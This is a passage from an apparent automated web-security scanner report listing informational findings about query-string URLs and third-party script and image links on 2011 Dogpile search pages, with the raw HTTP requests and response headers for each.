<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.45. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=372619a99e444149b304c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:50 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:50 GMT
Connection: close
Content-Length: 45939
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=9ca67cba22d942d9b570c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:51 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:51 GMT
Connection: close
Content-Length: 45941
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.47. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=613679421d264650a8bfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:41 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:41 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:41 GMT
Connection: close
Content-Length: 31893
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...

11.48. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ab86b0bd94034bf382bcc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:40 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:40 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:40 GMT
Connection: close
Content-Length: 32502
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
